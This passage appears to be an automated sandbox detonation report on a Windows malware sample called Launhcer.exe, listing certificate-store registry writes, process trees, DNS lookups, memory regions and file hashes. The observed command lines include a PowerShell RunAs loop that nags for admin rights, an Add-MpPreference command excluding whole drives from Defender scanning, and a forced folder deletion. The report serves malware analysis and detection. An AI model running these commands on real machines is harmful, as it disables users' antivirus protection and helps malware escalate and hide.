| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
Files
memory/2536-0-0x0000000073B4E000-0x0000000073B4F000-memory.dmp
memory/2536-1-0x0000000002F10000-0x0000000002F46000-memory.dmp
memory/2536-2-0x0000000073B40000-0x00000000742F0000-memory.dmp
memory/2536-3-0x0000000005960000-0x0000000005F88000-memory.dmp
memory/2536-4-0x0000000073B40000-0x00000000742F0000-memory.dmp
memory/2536-5-0x00000000060D0000-0x00000000060F2000-memory.dmp
memory/2536-6-0x0000000006170000-0x00000000061D6000-memory.dmp
memory/2536-7-0x00000000061E0000-0x0000000006246000-memory.dmp
memory/2536-13-0x0000000006250000-0x00000000065A4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qkboo5ar.ynp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2536-18-0x0000000006830000-0x000000000684E000-memory.dmp
memory/2536-19-0x0000000006860000-0x00000000068AC000-memory.dmp
memory/2536-20-0x00000000077F0000-0x0000000007886000-memory.dmp
memory/2536-21-0x0000000006D40000-0x0000000006D5A000-memory.dmp
memory/2536-22-0x0000000006D90000-0x0000000006DB2000-memory.dmp
memory/2536-23-0x0000000007E90000-0x0000000008434000-memory.dmp
memory/1052-34-0x0000000070480000-0x00000000704CC000-memory.dmp
memory/1052-33-0x00000000074A0000-0x00000000074D2000-memory.dmp
memory/1052-44-0x0000000007460000-0x000000000747E000-memory.dmp
memory/1052-45-0x00000000076E0000-0x0000000007783000-memory.dmp
memory/1052-46-0x0000000007E70000-0x00000000084EA000-memory.dmp
memory/1052-47-0x00000000078A0000-0x00000000078AA000-memory.dmp
memory/1052-48-0x0000000007A20000-0x0000000007A31000-memory.dmp
memory/1052-49-0x0000000007A60000-0x0000000007A6E000-memory.dmp
memory/1052-50-0x0000000007A70000-0x0000000007A84000-memory.dmp
memory/1052-51-0x0000000007AB0000-0x0000000007ACA000-memory.dmp
memory/1052-52-0x0000000007AA0000-0x0000000007AA8000-memory.dmp
memory/2536-56-0x0000000073B4E000-0x0000000073B4F000-memory.dmp
memory/2536-57-0x0000000073B40000-0x00000000742F0000-memory.dmp
memory/2536-58-0x0000000073B40000-0x00000000742F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7d2b7bdcc9dd0a8d01d1fc3de7b8ed9e |
| SHA1 | 450bf7ac31bb2e96739bd61df2e79c63fe945008 |
| SHA256 | ab32649f3ba9e9ce4bf52deddfa150a291dec53d0282f420abbebd7298f63885 |
| SHA512 | bebffe0c7871211b897377d346df86653d2cbdbfe90c4544c03f7b4fe8d13005128f5b5fcd655b62f5680bdc2f29fe00131a3e0a11b90148c34bad4a997fbebc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
memory/2536-62-0x0000000073B40000-0x00000000742F0000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240426-en
Max time kernel
80s
Max time network
93s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3148-0-0x000000007386E000-0x000000007386F000-memory.dmp
memory/3148-3-0x00000000052E0000-0x0000000005316000-memory.dmp
memory/3148-4-0x00000000059A0000-0x0000000005FCA000-memory.dmp
memory/3148-5-0x0000000073860000-0x0000000074011000-memory.dmp
memory/3148-6-0x0000000073860000-0x0000000074011000-memory.dmp
memory/3148-7-0x0000000006100000-0x0000000006122000-memory.dmp
memory/3148-8-0x00000000061A0000-0x0000000006206000-memory.dmp
memory/3148-9-0x0000000006210000-0x0000000006276000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4tngnfuw.ho4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3148-18-0x0000000006280000-0x00000000065D7000-memory.dmp
memory/3148-19-0x0000000006740000-0x000000000675E000-memory.dmp
memory/3148-20-0x0000000006780000-0x00000000067CC000-memory.dmp
memory/3148-23-0x0000000006CC0000-0x0000000006CE2000-memory.dmp
memory/3148-22-0x0000000006C70000-0x0000000006C8A000-memory.dmp
memory/3148-21-0x00000000076C0000-0x0000000007756000-memory.dmp
memory/3148-24-0x0000000007DC0000-0x0000000008366000-memory.dmp
memory/5048-33-0x0000000007470000-0x00000000074A4000-memory.dmp
memory/5048-34-0x00000000702B0000-0x00000000702FC000-memory.dmp
memory/5048-43-0x0000000006870000-0x000000000688E000-memory.dmp
memory/5048-44-0x00000000074B0000-0x0000000007554000-memory.dmp
memory/5048-45-0x0000000007C30000-0x00000000082AA000-memory.dmp
memory/5048-46-0x0000000007670000-0x000000000767A000-memory.dmp
memory/5048-47-0x00000000077F0000-0x0000000007801000-memory.dmp
memory/5048-48-0x0000000007830000-0x000000000783E000-memory.dmp
memory/5048-49-0x0000000007840000-0x0000000007855000-memory.dmp
memory/5048-50-0x0000000007880000-0x000000000789A000-memory.dmp
memory/5048-51-0x0000000007870000-0x0000000007878000-memory.dmp
memory/3148-55-0x000000007386E000-0x000000007386F000-memory.dmp
memory/3148-56-0x0000000073860000-0x0000000074011000-memory.dmp
memory/3148-57-0x0000000073860000-0x0000000074011000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9c66b1a9336019043876fb3ec6fb9eb7 |
| SHA1 | 6f3171b35a8ee68a48c65be950d28875830b8fa9 |
| SHA256 | f7e0d962f96a80189e8ad1508d5b54a892ea1ff17d35cd015ae85f048145af13 |
| SHA512 | 508e5ed50ec191712d3fd07601ec04da2285a0c05f9e5af3f051f4831e25abf626627dd4982e1a54f2cd9ffa89a8f3c996851450e9784416fe3883ca88f7a467 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
memory/3148-61-0x0000000073860000-0x0000000074011000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win11-20240426-en
Max time kernel
7s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240426-en
Max time kernel
133s
Max time network
160s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\wget.exe"
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/4064-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240426-en
Max time kernel
84s
Max time network
93s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\wget.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\wget.exe"
Network
Files
memory/248-0-0x0000000000400000-0x00000000008F2000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240508-en
Max time kernel
84s
Max time network
95s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\tAoMyd4BMpNH.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004C4 0x00000000000004D4
Network
Files
memory/2236-0-0x00007FFB4F083000-0x00007FFB4F085000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hmwpan32.mg3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2236-9-0x000001C37CB20000-0x000001C37CB42000-memory.dmp
memory/2236-10-0x00007FFB4F080000-0x00007FFB4FB42000-memory.dmp
memory/2236-11-0x00007FFB4F080000-0x00007FFB4FB42000-memory.dmp
memory/2236-12-0x00007FFB4F080000-0x00007FFB4FB42000-memory.dmp
memory/2236-15-0x00007FFB4F080000-0x00007FFB4FB42000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win10v2004-20240508-en
Max time kernel
7s
Max time network
17s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Launcher.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win10v2004-20240508-en
Max time kernel
134s
Max time network
157s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\appInfo\UqYyr4PZlPm4.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f0 0x338
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
